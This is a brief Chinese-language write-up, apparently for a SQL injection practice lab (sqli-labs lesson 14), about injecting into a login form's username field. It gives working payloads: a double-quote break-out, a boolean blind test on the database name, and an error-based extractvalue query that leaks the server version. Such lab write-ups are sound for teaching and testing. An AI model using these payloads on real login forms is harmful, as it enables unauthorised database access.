标签:
本关我们直接进行测试,输入username:admin"
Pasword:(随意)
可以看到报错了,那么我们知道了id进行了 " 的操作。
这里和less13一样,主要是熟悉利用盲注。
简单列一下payload:
uname=admin"and left(database(),1)>‘a‘#&passwd=1&submit=Submit
可以登录成功。
在利用一下报错注入
uname=admin"and extractvalue(1,concat(0x7e,(select @@version),0x7e))#&passwd=1&submit=Submit
可以看到报错了,显示版本信息。
标签:
原文地址:http://www.cnblogs.com/lcamry/p/5763064.html